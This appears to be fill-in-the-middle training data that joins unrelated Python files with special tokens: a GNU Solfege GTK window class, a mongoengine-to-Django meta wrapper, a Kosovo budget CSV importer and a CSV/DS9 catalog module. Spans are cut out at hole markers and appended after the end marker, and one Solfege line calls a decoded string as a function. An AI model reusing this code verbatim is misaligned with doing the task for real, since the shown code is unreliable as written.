self.connect('key_press_event', self.on_key_press_event)
self.g_about_window = None
self.m_exercise = None
self.m_viewer = None
self.box_dict = {}
self.g_config_window = None
self.g_path_info_dlg = None
self.g_musicviewer_window = None
self.m_history = []
self.g_ui_manager = Gtk.UIManager()
self.m_action_groups = {
'Exit': Gtk.ActionGroup('Exit'),
'NotExit': Gtk.ActionGroup('NotExit'),
}
for a in self.m_action_groups.values():
self.g_ui_manager.insert_action_group(a, 1)
self.setup_menu()
self.main_box = Gtk.VBox()
self.main_box.show()
self._vbox.pack_start(self.main_box, True, True, 0)
def get_view(self):
"""
Return the view that is currently visible.
Raise KeyError if no view has yet been added.
"""
return self.box_dict[self.m_viewer]
def add_view(self, view, name):
"""
Hide the current view.
Add and view the new view.
"""
assert name not in self.box_dict
if self.m_viewer:
self.get_view().hide()
self.box_dict[name] = view
self.main_box.pack_start(self.box_dict[name], True, True, 0)
self.box_dict[name].show()
self.m_viewer = name
def show_view(self, name):
"""
Return False if the view does not exist.
Hide the current visible view, show the view named 'name' and
return True.
"""
if name not in self.box_dict:
return False
self.get_view().hide()
self.m_viewer = name
self.box_dict[name].show()
return True
def change_frontpage(self, filename):
"""
Change to a different frontpage file.
"""
self.set_string('app/frontpage', filename)
self.load_frontpage()
def load_frontpage(self):
"""
Load the front page file set in the config database into
solfege.app.m_frontpage_data
"""
filename = self.get_string("app/frontpage")
if filename == self.debug_front_page and not solfege.app.m_options.debug:
self.set_string("app/frontpage", self.default_front_page)
filename = self.default_front_page
if not os.path.isfile(filename):
filename = self.default_front_page
try:
solfege.app.m_frontpage_data = frontpage.load_tree(filename)
except Exception, e:
if solfege.splash_win:
solfege.splash_win.hide()
solfege.app.m_frontpage_data = frontpage.load_tree(self.default_front_page)
self.set_string('app/frontpage', self.default_front_page)
gu.dialog_ok(_("Loading front page '%s' failed. Using default page." % filename),
secondary_text = "\n".join(traceback.format_exception(*sys.exc_info())))
if solfege.splash_win:
solfege.splash_win.show()
self.display_frontpage()
def setup_menu(self):
self.m_action_groups['Exit'].add_actions([
('FileMenu', None, _('_File')),
('AppQuit', 'gtk-quit', None, None, None, self.quit_program),
])
self.m_action_groups['NotExit'].add_actions([
('TheoryMenu', None, _('The_ory')),
('FrontPagesMenu', None, _('Sele_ct Front Page')),
('TheoryIntervals', None, _('_Intervals'), None, None,
lambda o: solfege.app.handle_href('theory-intervals.html')),
('TreeEditor', None, _('_Edit Front Page'), None, None,
self.do_tree_editor),
('ExportTrainingSet', None, _(u'E_xport Exercises to Audio Files…'), None, None,
self.new_training_set_editor),
('EditPractiseSheet', None, _(u'Ear Training Test Pri_ntout…'), None, None,
self.new_practisesheet_editor),
('ProfileManager', None, _("Profile _Manager"), None, None,
self.open_profile_manager),
('OpenPreferencesWindow', 'gtk-preferences', None, '<ctrl>F12', None,
self.open_preferences_window),
('HelpMenu', None, _('_Help')),
('Search', 'gtk-search', _('_Search Exercises'), '<ctrl>F', None,
self.on_search_all_exercises),
('FrontPage', None, _('_Front Page'), 'F5', None,
lambda w: self.display_frontpage()),
('TestsPage', None, _('_Tests Page'), 'F6', None,
lambda w: self.display_testpage()),
('RecentExercises', None, _('_Recent Exercises'), 'F7', None,
self.display_recent_exercises),
('RecentTests', None, _('_Recent Tests'), 'F8', None,
self.display_recent_tests),
('UserExercises', None, _('_User Exercises'), 'F9', None,
self.display_user_exercises),
('SetupPyAlsa', None, _("Download and compile ALSA modules"), None, None, self.setup_pyalsa),
('HelpHelp', 'gtk-help', _('_Help on the current exercise'), 'F1', None,
lambda o: solfege.app.please_help_me()),
('HelpTheory', None, _('_Music theory on the current exercise'), 'F3', None, lambda o: solfege.app.show_exercise_theory()),
('HelpIndex', None, _('_User manual'), None, None,
lambda o: solfege.app.handle_href('index.html')),
('HelpShowPathInfo', None, _('_File locations'), None,
None, self.show_path_info),
('HelpOnline', None, _('_Mailing lists, web page etc.'), None, None,
lambda o: solfege.app.handle_href('online-resources.html')),
('HelpDonate', None, _('_Donate'), None, None,
lambda o: solfege.app.handle_href('http://www.solfege.org/donate/')),
('HelpReportingBugs', None, _('Reporting _bugs'), None, None,
lambda o: solfege.app.handle_href('bug-reporting.html')),
('HelpAbout', 'gtk-about', None, None, None, self.show_about_window),
('ShowBugReports', None, _('_See your bug reports'), None, None,
self.show_bug_reports),
])
self.g_ui_manager.add_ui_from_file("ui.xml")
self.add_accel_group(self.g_ui_manager.get_accel_group())
hdlbox = Gtk.HandleBox()
hdlbox.show()
hdlbox.add(self.g_ui_manager.get_widget('/Menubar'))
self._vbox.pack_start(hdlbox, False, False, 0)
self.m_help_on_current_merge_id = None
def create_frontpage_menu(self):
"""
Create, or update if already existing, the submenu that let the
user choose which front page file to display.
"""
if self.m_frontpage_merge_id:
self.g_ui_manager.remove_ui(self.m_frontpage_merge_id)
actions = []
old_dir = None
s = "<menubar name='Menubar'><menu action='FileMenu'><menu action='FrontPagesMenu'>"
for fn in frontpage.get_front_pages_list(solfege.app.m_options.debug):
if solfege.splash_win:
solfege.splash_win.show_progress(fn)
if not frontpage.may_be_frontpage(fn):
continue
try:
title = lessonfile.infocache.frontpage.get(fn, 'title')
except TypeError:
continue
cur_dir = os.path.split(fn)[0]
if old_dir != cur_dir:
s += '<separator name="sep@%s"/>' % fn
old_dir = cur_dir
s += "<menuitem action='%s'/>\n" % fn
if not self.m_action_groups['NotExit'].get_action(fn):
actions.append((fn, None, lessonfile.infocache.frontpage.get(fn, 'title'), None, fn,
lambda o, f=fn: self.change_frontpage(f)))
else:
action = self.m_action_groups['NotExit'].get_action(fn)
action.props.label = lessonfile.infocache.frontpage.get(fn, 'title')
s += "</menu></menu></menubar>"
self.m_action_groups['NotExit'].add_actions(actions)
self.m_frontpage_merge_id = self.g_ui_manager.add_ui_from_string(s)
def show_help_on_current(self):
"""
Show the menu entries for the exercise help and music theory
pages on the Help menu.
"""
if self.m_help_on_current_merge_id:
return
self.m_help_on_current_merge_id = self.g_ui_manager.add_ui_from_string("""
<menubar name='Menubar'>
<menu action='HelpMenu'>
<placeholder name='PerExerciseHelp'>
<menuitem position='top' action='HelpHelp' />
<menuitem action='HelpTheory' />
</placeholder>
</menu>
</menubar>""")
def hide_help_on_current(self):
"""
Hide the menu entries for the help and music theory pages on the
Help menu.
"""
if not self.m_help_on_current_merge_id:
return
self.g_ui_manager.remove_ui(self.m_help_on_current_merge_id)
self.m_help_on_current_merge_id = None
def show_bug_reports(self, *v):
m = Gtk.Dialog(_("Question"), self, 0)
m.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)
m.add_button(Gtk.STOCK_OK, Gtk.ResponseType.OK)
vbox = Gtk.VBox()
m.vbox.pack_start(vbox, False, False, 0)
vbox.set_spacing(18)
vbox.set_border_width(12)
l = Gtk.Label(label=_("Please enter the email used when you submitted the bugs:"))
vbox.pack_start(l, False, False, 0)
self.g_email = Gtk.Entry()
m.action_area.get_children()[0].grab_default()
self.g_email.set_activates_default(True)
vbox.pack_start(self.g_email, False, False, 0)
m.show_all()
ret = m.run()
m.destroy()
if ret == Gtk.ResponseType.OK:
params = urllib.urlencode({
'pagename': 'SITS-Incoming/SearchBugs',
'q': 'SITS-Incoming/"Submitter: %s"' % utils.mangle_email(self.g_email.get_text().decode("utf-8")()),
})
try:
webbrowser.open_new("http://www.solfege.org?%s" % params)
except Exception, e:
self.display_error_message2(_("Error opening web browser"), str(e))
def display_error_message2(self, text, secondary_text):
"""
This is the new version of display_error_message, and it will
eventually replace the old.
"""
if solfege.splash_win and solfege.splash_win.props.visible:
solfege.splash_win.hide()
reshow_splash = True
else:
reshow_splash = False
if not isinstance(text, unicode):
text = text.decode(locale.getpreferredencoding(), 'replace')
if not isinstance(secondary_text, unicode):
secondary_text = secondary_text.decode(locale.getpreferredencoding(), 'replace')
m = Gtk.MessageDialog(None, Gtk.DialogFlags.MODAL, Gtk.MessageType.ERROR,
Gtk.ButtonsType.CLOSE, text)
if secondary_text:
m.format_secondary_text(secondary_text)
m.run()
m.destroy()
if reshow_splash:
solfege.splash_win.show()
while Gtk.events_pending():
Gtk.main_iteration()
def display_error_message(self, msg, title=None, secondary_text=None):
if solfege.splash_win and solfege.splash_win.props.visible:
solfege.splash_win.hide()
reshow_splash = True
else:
reshow_splash = False
if not isinstance(msg, unicode):
msg = msg.decode(locale.getpreferredencoding(), 'replace')
m = Gtk.MessageDialog(None, Gtk.DialogFlags.MODAL, Gtk.MessageType.ERROR,
Gtk.ButtonsType.CLOSE, None)
m.set_markup(gu.escape(msg))
if title:
m.set_title(title)
if secondary_text:
m.format_secondary_text(secondary_text)
m.run()
m.destroy()
if reshow_splash:
solfege.splash_win.show()
while Gtk.events_pending():
Gtk.main_iteration()
def show_path_info(self, w):
if not self.g_path_info_dlg:
self.g_path_info_dlg = Gtk.Dialog(_("_File locations").replace("_", ""), self,
buttons=(Gtk.STOCK_OK, Gtk.ResponseType.ACCEPT))
sc = Gtk.ScrolledWindow()
sc.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.NEVER)
self.g_path_info_dlg.vbox.pack_start(sc, True, True, 0)
#
vbox = gu.hig_dlg_vbox()
sc.add_with_viewport(vbox)
box1, box2 = gu.hig_category_vbox(_("_File locations").replace("_", ""))
vbox.pack_start(box1, True, True, 0)
sizegroup = Gtk.SizeGroup(Gtk.SizeGroupMode.HORIZONTAL)
# statistics.sqlite
# win32 solfegerc
# win32 langenviron.txt
box2.pack_start(gu.hig_label_widget(_("Solfege application data:"), Gtk.Label(label=filesystem.app_data()), sizegroup), False, False, 0)
box2.pack_start(gu.hig_label_widget(_("Solfege user data:"), Gtk.Label(label=filesystem.user_data()), sizegroup), False, False, 0)
box2.pack_start(gu.hig_label_widget(_("Solfege config file:"), Gtk.Label(label=filesystem.rcfile()), sizegroup), False, False, 0)
box2.pack_start(gu.hig_label_widget(_("Solfege installation directory:"), Gtk.Label(label=os.getcwdu()), sizegroup), False, False, 0)
box2.pack_start(gu.hig_label_widget(_("User manual in HTML format:"), Gtk.Label(label=os.path.join(os.getcwdu(), "help")), sizegroup), False, False, 0)
box2.pack_start(gu.hig_label_widget("gtk:", Gtk.Label(label=str(Gtk)), sizegroup), False, False, 0)
box2.pack_start(gu.hig_label_widget("pyalsa:", Gtk.Label(label=str(alsaseq)), sizegroup), False, False, 0)
box2.pack_start(gu.hig_label_widget("PYTHONHOME", Gtk.Label(os.environ.get('PYTHONHOME', 'Not defined')), sizegroup), False, False, 0)
self.g_path_info_dlg.show_all()
def f(*w):
self.g_path_info_dlg.hide()
return True
self.g_path_info_dlg.connect('response', f)
self.g_path_info_dlg.connect('delete-event', f)
sc.set_size_request(min(vbox.size_request().width + gu.SPACE_LARGE * 2,
Gdk.Screen.width() * 0.9),
vbox.size_request().height)
def setup_pyalsa(self, widget):
download_pyalsa.download()
def show_about_window(self, widget):
pixbuf = self.render_icon('solfege-icon', Gtk.IconSize.DIALOG)
a = self.g_about_window = Gtk.AboutDialog()
a.set_program_name("GNU Solfege")
a.set_logo(pixbuf)
a.set_website("http://www.solfege.org")
a.set_version(buildinfo.VERSION_STRING)
a.set_copyright("Copyright (C) 2013 Tom Cato Amundsen and others")
a.set_license("\n".join((solfege.application.solfege_copyright, solfege.application.warranty)))
# Using set_license_type causes the app to print warnings.
#a.set_license_type(Gtk.License.GPL_3_0)
a.set_authors(["Tom Cato Amundsen",
'Giovanni Chierico %s' % _("(some lessonfiles)"),
'Michael Becker %s' % _("(some lessonfiles)"),
'Joe Lee %s' % _("(sound code for the MS Windows port)"),
'Steve Lee %s' % _("(ported winmidi.c to gcc)"),
'Thibaus Cousin %s' % _("(spec file for SuSE 8.2)"),
'David Coe %s' %_("(spec file cleanup)"),
'David Petrou %s' % _("(testing and portability fixes for FreeBSD)"),
'Han-Wen Nienhuys %s' % _("(the music font from Lilypond)"),
'Jan Nieuwenhuizen %s' % _("(the music font from Lilypond)"),
'Davide Bonetti %s' % _("(scale exercises)"),
])
a.set_documenters(["Tom Cato Amundsen",
"Tom Eykens",
])
if _("SOLFEGETRANSLATORS") == 'SOLFEGETRANSLATORS':
a.set_translator_credits(None)
else:
a.set_translator_credits(_("SOLFEGETRANSLATORS"))
self.g_about_window.run()
self.g_about_window.destroy()
def do_tree_editor(self, *v):
"""
Open a front page editor editing the current front page.
"""
fpeditor.Editor.edit_file(self.get_string("app/frontpage"))
def post_constructor(self):
self.m_frontpage_merge_id = None
self.create_frontpage_menu()
self.g_ui_manager.add_ui_from_file("help-menu.xml")
if sys.platform != 'linux2':
self.g_ui_manager.get_widget('/Menubar/HelpMenu/SetupPyAlsa').hide()
if solfege.app.m_sound_init_exception is not None:
if solfege.splash_win:
solfege.splash_win.destroy()
solfege.splash_win = None
solfege.app.display_sound_init_error_message(solfege.app.m_sound_init_exception)
# MIGRATION 3.9.0
if sys.platform == "win32" \
and os.path.exists(os.path.join(filesystem.get_home_dir(), "lessonfiles")) \
and not os.path.exists(filesystem.user_lessonfiles()):
if solfege.splash_win:
solfege.splash_win.hide()
do_move = gu.dialog_yesno(_('In Solfege 3.9.0, the location where Solfege look for lesson files you have created was changed. The files has to be moved from "%(old)s" and into the folder "%(gnu)s" in your "%(doc)s" folder.\nMay I move the files automatically for you now?' % {
'doc': os.path.split(os.path.split(filesystem.user_data())[0])[1],
'gnu': os.path.join(filesystem.appname, 'lessonfiles'),
'old': os.path.join(filesystem.get_home_dir(), "lessonfiles"),
}), parent=self)
if do_move:
try:
os.makedirs(filesystem.user_data())
shutil.copytree(os.path.join(filesystem.get_home_dir(), "lessonfiles"),
os.path.join(filesystem.user_data(), "lessonfiles"))
except (OSError, shutil.Error), e:
gu.dialog_ok(_("Error while copying directory:\n%s" % e))
else:
gu.dialog_ok(_("Files copied. The old files has been left behind. Please delete them when you have verified that all files was copied correctly."))
if solfege.splash_win:
solfege.splash_win.show()
# MIGRATION 3.9.3 when we added langenviron.bat and in 3.11
# we migrated to langenviron.txt because we does not use cmd.exe
if sys.platform == 'win32' and winlang.win32_get_langenviron() != self.get_string('app/lc_messages'):
gu.dialog_ok(_("Migrated old language setup. You might have to restart the program all translated messages to show up."))
winlang.win32_put_langenviron(self.get_string('app/lc_messages'))
# MIGRATION 3.11.1: earlier editors would create new learning trees
# below app_data() instead of user_data().
if (sys.platform == "win32" and
os.path.exists(os.path.join(filesystem.app_data(),
"learningtrees"))):
if not os.path.exists(os.path.join(filesystem.user_data(), "learningtrees")):
os.makedirs(os.path.join(filesystem.user_data(), "learningtrees"))
for fn in os.listdir(os.path.join(filesystem.app_data(), "learningtrees")):
if not os.path.exists(os.path.join(filesystem.user_data(), "learningtrees", fn)):
shutil.move(os.path.join(filesystem.app_data(), "learningtrees", fn),
os.path.join(filesystem.user_data(), "learningtrees"))
else:
# We add the .bak exstention if the file already exists.
shutil.move(os.path.join(filesystem.app_data(), "learningtrees", fn),
os.path.join(filesystem.user_data(), "learningtrees", u"%s.bak" % fn))
os.rmdir(os.path.join(os.path.join(filesystem.app_data(), "learningtrees")))
item = self.g_ui_manager.get_widget("/Menubar/FileMenu/FrontPagesMenu")
item.connect('activate', lambda s: self.create_frontpage_menu())
try:
i18n.locale_setup_failed
print >> sys.stderr, "\n".join(textwrap.wrap("Translations are disabled because your locale settings are broken. This is not a bug in GNU Solfege, so don't report it. The README file distributed with the program has some more details."))
except AttributeError:
pass
for filename in lessonfile.infocache.frontpage.iter_old_format_files():
gu.dialog_ok(_("Cannot load front page file"), None,
_(u"The file «%s» is saved in an old file format. The file can be converted by editing and saving it with an older version of Solfege. Versions from 3.16.0 to 3.20.4 should do the job.") % filename)
def activate_exercise(self, module, urlobj=None):
self.show_view(module)
# We need this test because not all exercises use a notebook.
if self.get_view().g_notebook:
if urlobj and urlobj.action in ['practise', 'config', 'statistics']:
self.get_view().g_notebook.set_current_page(
['practise', 'config', 'statistics'].index(urlobj.action))
else:
self.get_view().g_notebook.set_current_page(0)
self.set_title("Solfege - " + self.get_view().m_t.m_P.header.title)
def display_docfile(self, fn):
"""
Display the HTML file named by fn in the help browser window.
"""
for lang in solfege.app.m_userman_language, "C":
filename = os.path.join(os.getcwdu(), u"help", lang, fn)
if os.path.isfile(filename):
break
try:
webbrowser.open(filename)
except Exception, e:
self.display_error_message2(_("Error opening web browser"), str(e))
def display_user_exercises(self, w):
col = frontpage.Column()
page = frontpage.Page(_('User exercises'), col)
curdir = None
linklist = None
for filename in lessonfile.infocache.iter_user_files(only_user_collection=True):
dir, fn = os.path.split(filename)
if dir != curdir:
curdir = dir
linklist = frontpage.LinkList(dir)
col.append(linklist)
linklist.append(filename)
if os.path.isdir(filesystem.user_lessonfiles()):
linklist = None
col.append(frontpage.Paragraph(_('You really should move the following directory to a directory below <span font_family="monospace">%s</span>. Future versions of GNU Solfege will not display files in the old location. The user manual have details on where to place the files.') % os.path.join(filesystem.user_data(), u'exercises')))
# Added just to be nice with people not moving their files from
# pre 3.15.3 location:
for filename in os.listdir(filesystem.user_lessonfiles()):
if not linklist:
linklist = frontpage.LinkList(filesystem.user_lessonfiles())
linklist.append(os.path.join(filesystem.user_lessonfiles(), filename))
# only display the linklist if there are any files.
if linklist:
col.append(linklist)
self.display_frontpage(page)
def display_recent_exercises(self, w):
data = frontpage.Page(_('Recent exercises'),
[frontpage.Column(
[frontpage.LinkList(_('Recent exercises'),
solfege.db.recent(8))])])
self.display_frontpage(data, show_topics=True)
self.get_view().g_searchbox.hide()
def display_recent_tests(self, w):
data = frontpage.Page(_('Recent tests'),
[frontpage.Column(
[frontpage.LinkList(_('Recent tests'),
solfege.db.recent_tests(8))])])
self.display_testpage(data, show_topics=True)
self.get_view().g_searchbox.hide()
def display_testpage(self, data=None, show_topics=False):
"""
Display the front page of the data in solfege.app.m_frontpage_data
"""
self.set_title("GNU Solfege - tests")
if not self.show_view('testspage'):
p = TestsView()
p.connect('link-clicked', self.history_handler)
self.add_view(p, 'testspage')
self.get_view().g_searchbox.show()
if not data:
data = solfege.app.m_frontpage_data
self.trim_history(self.get_view(), data)
self.get_view().display_data(data, show_topics=show_topics)
def on_search_all_exercises(self, widget=None):
self.set_title("GNU Solfege")
if not self.show_view('searchview'):
self.add_view(SearchView(_('Search the exercise titles of all lesson files found by the program, not just the active front page with sub pages.')), 'searchview')
def display_frontpage(self, data=None, show_topics=False):
"""
Display the front page of the data in solfege.app.m_frontpage_data
"""
if solfege.app.m_options.profile:
self.set_title("GNU Solfege - %s" % solfege.app.m_options.profile)
else:
self.set_title("GNU Solfege")
if not self.show_view('frontpage'):
p = FrontPage()
p.connect('link-clicked', self.history_handler)
self.add_view(p, 'frontpage')
self.get_view().g_searchbox.show()
if not data:
data = solfege.app.m_frontpage_data
self.trim_history(self.get_view(), data)
self.get_view().display_data(data, show_topics=show_topics)
def trim_history(self, new_viewer, new_page):
# First check if the page we want to display is in m_history.
# If so, we will trunkate history after it.
for i, (viewer, page) in enumerate(self.m_history):
if (new_viewer != viewer) or (new_page == page):
self.m_history = self.m_history[:i]
break
def history_handler(self, *w):
self.m_history.append(w)
def initialise_exercise(self, teacher):
"""
Create a Gui object for the exercise and add it to
the box_dict dict.
"""
assert teacher.m_exname not in self.box_dict
self.get_view().hide()
m = solfege.app.import_module(teacher.m_exname)
self.add_view(m.Gui(teacher), teacher.m_exname)
def on_key_press_event(self, widget, event):
try:
view = self.get_view()
except KeyError:<|fim▁hole|> return
if (event.type == Gdk.EventType.KEY_PRESS
and event.get_state() & Gdk.ModifierType.MOD1_MASK == Gdk.ModifierType.MOD1_MASK# Alt key
and event.keyval in (Gdk.KEY_KP_Left, Gdk.KEY_Left)
and self.m_history
and not solfege.app.m_test_mode):
obj, page = self.m_history[-1]
self.trim_history(obj, page)
# Find the box_dict key for obj
for k, o in self.box_dict.items():
if o == obj:
obj.display_data(page)
self.show_view(k)
break
return True
view.on_key_press_event(widget, event)
def open_profile_manager(self, widget=None):
p = ChangeProfileDialog(solfege.app.m_options.profile)
if p.run() == Gtk.ResponseType.ACCEPT:
prof = p.get_profile()
else:
# The user presses cancel. This will use the same profile as
# before, but if the user has renamed the active profile, then
# we need to use the new name.
prof = p.m_default_profile
solfege.app.reset_exercise()
solfege.app.m_options.profile = prof
solfege.db.conn.commit()
solfege.db.conn.close()
solfege.db = statistics.DB(None, profile=prof)
cfg.set_string("app/last_profile", prof)
self.display_frontpage()
p.destroy()
def open_preferences_window(self, widget=None):
if not self.g_config_window:
self.g_config_window = ConfigWindow()
self.g_config_window.show()
else:
self.g_config_window.update_old_statistics_info()
self.g_config_window.update_statistics_info()
self.g_config_window.show()
def quit_program(self, *w):
can_quit = True
for dlg in gu.EditorDialogBase.instance_dict.values():
if dlg.close_window():
dlg.destroy()
else:
can_quit = False
break
if can_quit:
solfege.app.quit_program()
Gtk.main_quit()
else:
return True
def display_in_musicviewer(self, music):
if not self.g_musicviewer_window:
self.g_musicviewer_window = MusicViewerWindow()
self.g_musicviewer_window.show()
self.g_musicviewer_window.display_music(music)
def close_musicviewer(self, widget=None):
self.g_musicviewer_window.destroy()
self.g_musicviewer_window = None
def enter_test_mode(self):
if 'enter_test_mode' not in dir(self.get_view()):
gu.dialog_ok(_("The '%s' exercise module does not support test yet." % self.m_viewer))
return
self.m_action_groups['NotExit'].set_sensitive(False)
self.g = self.get_view().g_notebook.get_nth_page(0)
self.get_view().g_notebook.get_nth_page(0).reparent(self.main_box)
self.get_view().g_notebook.hide()
self.get_view().enter_test_mode()
def exit_test_mode(self):
solfege.app.m_test_mode = False
self.m_action_groups['NotExit'].set_sensitive(True)
box = Gtk.VBox()
self.get_view().g_notebook.insert_page(box, Gtk.Label(label=_("Practise")), 0)
self.g.reparent(box)
self.get_view().g_notebook.show()
self.get_view().g_notebook.get_nth_page(0).show()
self.get_view().g_notebook.set_current_page(0)
self.get_view().exit_test_mode()
def new_training_set_editor(self, widget):
dlg = TrainingSetDialog()
dlg.show_all()
def new_practisesheet_editor(self, widget):
dlg = PractiseSheetDialog()
dlg.show_all()<|fim▁end|> | |
<|file_name|>document_options.py<|end_file_name|><|fim▁begin|>import sys
import warnings
from django.db.models.fields import FieldDoesNotExist
from django.utils.text import capfirst
from django.utils.encoding import smart_text
try:
from django.db.models.options import get_verbose_name
except ImportError:
from django.utils.text import camel_case_to_spaces as get_verbose_name
from mongoengine.fields import ReferenceField
class PkWrapper(object):
"""Used to wrap the Primary Key so it can mimic Django's expectations
"""
editable = False
remote_field = None
def __init__(self, wrapped):
self.obj = wrapped
def __getattr__(self, attr):
if attr in dir(self.obj):
return getattr(self.obj, attr)
raise AttributeError("{} has no {}".format(self, attr))
def __setattr__(self, attr, value):
if attr != 'obj' and hasattr(self.obj, attr):
setattr(self.obj, attr, value)
super(PkWrapper, self).__setattr__(attr, value)
def value_to_string(self, obj):
"""
Returns a string value of this field from the passed obj.
This is used by the serialization framework.
"""
return smart_text(obj.pk)
class DocumentMetaWrapper(object):
"""
Used to store mongoengine's _meta dict to make the document admin
as compatible as possible to django's meta class on models.
"""
_pk = None
pk_name = None
app_label = None
model_name = None
verbose_name = None
has_auto_field = False
object_name = None
proxy = []
virtual_fields = []
concrete_fields = []
proxied_children = []
parents = {}
many_to_many = []
swapped = False
_field_cache = None
document = None
_meta = None
def __init__(self, document):
if isinstance(document._meta, DocumentMetaWrapper):
meta = document._meta._meta
else:
meta = document._meta
self.document = document
self._meta = meta or {}
self.model = document
self.concrete_model = document
self.concrete_fields = document._fields.values()
self.fields = self.concrete_fields
try:
self.object_name = self.document.__name__
except AttributeError:
self.object_name = self.document.__class__.__name__
self.model_name = self.object_name.lower()
self.app_label = self.get_app_label()
self.verbose_name = self.get_verbose_name()
# EmbeddedDocuments don't have an id field.
try:
self.pk_name = self._meta['id_field']
self._init_pk()
except KeyError:
pass
@property
def module_name(self):
"""
This property has been deprecated in favor of `model_name`.
"""
warnings.warn(
"Options.module_name has been deprecated in favor of model_name",
PendingDeprecationWarning, stacklevel=2)
return self.model_name
def get_app_label(self):
model_module = sys.modules[self.document.__module__]
return model_module.__name__.split('.')[-2]
def get_verbose_name(self):
"""
Returns the verbose name of the document.
Checks the original meta dict first. If it is not found
then generates a verbose name from from the object name.
"""
try:
return capfirst(get_verbose_name(self._meta['verbose_name']))
except KeyError:
return capfirst(get_verbose_name(self.object_name))
@property
def verbose_name_raw(self):
return self.verbose_name
@property
def verbose_name_plural(self):
return "%ss" % self.verbose_name
@property
def pk(self):
if not hasattr(self._pk, 'attname'):
self._init_pk()
return self._pk
def get_fields(self, include_parents=True, include_hidden=False):
# XXX: simple placeholder; TODO: handle options;
return self.concrete_fields
def _init_pk(self):
"""
Adds a wrapper around the documents pk field. The wrapper object gets the attributes
django expects on the pk field, like name and attname.
The function also adds a _get_pk_val method to the document.
"""
if self.id_field is None:
return
try:
pk_field = getattr(self.document, self.id_field)
self._pk = PkWrapper(pk_field)
self._pk.name = self.id_field
self._pk.attname = self.id_field
except AttributeError:
return
def get_add_permission(self):
return 'add_%s' % self.object_name.lower()
def get_change_permission(self):
return 'change_%s' % self.object_name.lower()
def get_delete_permission(self):
return 'delete_%s' % self.object_name.lower()
def get_ordered_objects(self):
return []
def get_field_by_name(self, name):
"""
Returns the (field_object, model, direct, m2m), where field_object is
the Field instance for the given name, model is the model containing
this field (None for local fields), direct is True if the field exists
on this model, and m2m is True for many-to-many relations. When
'direct' is False, 'field_object' is the corresponding RelatedObject
for this field (since the field doesn't have an instance associated
with it).
Uses a cache internally, so after the first access, this is very fast.
"""
try:
try:
return self._field_cache[name]
except TypeError:
self._init_field_cache()
return self._field_cache[name]
except KeyError:
raise FieldDoesNotExist('%s has no field named %r'
% (self.object_name, name))
def _init_field_cache(self):
if self._field_cache is None:
self._field_cache = {}
for f in self.document._fields.values():
if isinstance(f, ReferenceField):
document = f.document_type
self._field_cache[document._meta.module_name] = (f, document, False, False)
else:
self._field_cache[f.name] = (f, None, True, False)
return self._field_cache
def get_field(self, name, many_to_many=True):
"""
Returns the requested field by name. Raises FieldDoesNotExist on error.
"""
return self.get_field_by_name(name)[0]
def __getattr__(self, name):
try:
return self._meta[name]
except KeyError as e:
raise AttributeError(*e.args)
def __setattr__(self, name, value):
if not hasattr(self, name):
self._meta[name] = value
else:
super(DocumentMetaWrapper, self).__setattr__(name, value)
def __getitem__(self, key):
return self._meta[key]
def __setitem__(self, key, value):<|fim▁hole|> return key in self._meta
def get(self, key, default=None):
try:
return self.__getitem__(key)
except KeyError:
return default
def get_parent_list(self):
return []
def get_all_related_objects(self, *args, **kwargs):
return []
def iteritems(self):
return self._meta.iteritems()
def items(self):
return self._meta.items()<|fim▁end|> | self._meta[key] = value
def __contains__(self, key): |
<|file_name|>kosovo_importer.py<|end_file_name|><|fim▁begin|>from abstract_importer import AbstractImporter
from slugify import slugify
class KosovoImporter(AbstractImporter):
<|fim▁hole|> pass
def get_csv_filename(self):
return "importer/data/kosovo/kosovo-budget-expenditures-2014.csv"
def get_region(self):
return 'Kosovo'
def get_dataset(self):
return 'Budget Expenditure (2014)'
def build_docs(self, row):
# In this case, it's because in the CSV doc there is a column for each year...
year = row[3]
# Clean expense string so that is is numerical (e.g. turn blank string to 0).
cost = row[2].replace(',', '')
if not cost.strip():
cost = 0
# Create doc.
doc = {
'region': {
'name': self.get_region(),
'slug': slugify(self.get_region(), to_lower=True)
},
'dataset': {
'name': self.get_dataset(),
'slug': slugify(self.get_dataset(), to_lower=True)
},
'activity': {
'type': row[0],
'description': row[1]
},
'cost': float(cost),
'year': int(year)
}
# Console output to provide user with feedback on status of importing process.
print '%s - %s: %s (%s %i)' % (doc['activity']['type'], doc['activity']['description'], doc['cost'], doc['region']['name'], doc['year'])
return [doc]<|fim▁end|> | def __init__(self): |
<|file_name|>ascii.py<|end_file_name|><|fim▁begin|>"""Module to read/write ascii catalog files (CSV and DS9)"""
##@package catalogs
##@file ascii_data<|fim▁hole|>The following functions are meant to help in reading and writing text CSV catalogs
as well as DS9 region files. Main structure used is dictionaries do deal with catalog
data in a proper way.
"""
import sys
import logging
import csv
import re
import string
# ---
def dict_to_csv(columns, fieldnames=[], filename='cat.csv', mode='w', delimiter=','):
"""
Write a CSV catalog from given dictionary contents
Given dictionary is meant to store lists of values corresponding to key/column in the
csv file. So that each entry 'fieldnames' is expected to be found within 'columns'
keys, and the associated value (list) will be written in a csv column
Input:
- columns {str:[]} : Contents to be write in csv catalog
- fieldnames [str] : List with fieldnames/keys to read from 'columns'
- filename str : Name of csv catalog to write
- mode str : Write a new catalog, 'w', or append to an existing one, 'a'.
- delimiter str : Delimiter to use between columns in 'filename'
Output:
* If no error messages are returned, a file 'filename' is created.
Example:
>>> D = {'x':[0,0,1,1],'y':[0,1,0,1],'id':['0_0','0_1','1_0','1_1'],'z':[0,0.5,0.5,1]} #\
>>> fields = ['id','x','y','z'] #\
>>> #\
>>> dict_to_csv( D, fields, filename='test.csv') #\
>>> #\
>>> import os #\
>>> #\
---
"""
dictionary = columns.copy()
if fieldnames == []:
fieldnames = dictionary.keys()
for k in fieldnames:
if type(dictionary[k])!=type([]) and type(dictionary[k])!=type(()):
dictionary[k] = [dictionary[k]]
logging.debug("Fields being written to (csv) catalog: %s",fieldnames)
max_leng = max([ len(dictionary[k]) for k in fieldnames if type(dictionary[k])==type([]) ])
for k in fieldnames:
leng = len(dictionary[k])
if leng != max_leng:
dictionary[k].extend(dictionary[k]*(max_leng-leng))
catFile = open(filename,mode)
catObj = csv.writer(catFile, delimiter=delimiter)
catObj.writerow(fieldnames)
LL = [ dictionary[k] for k in fieldnames ]
for _row in zip(*LL):
catObj.writerow(_row)
catFile.close()
return
# ---
def dict_from_csv(filename, fieldnames, header_lines=1, delimiter=',',dialect='excel'):
"""
Read CSV catalog and return a dictionary with the contents
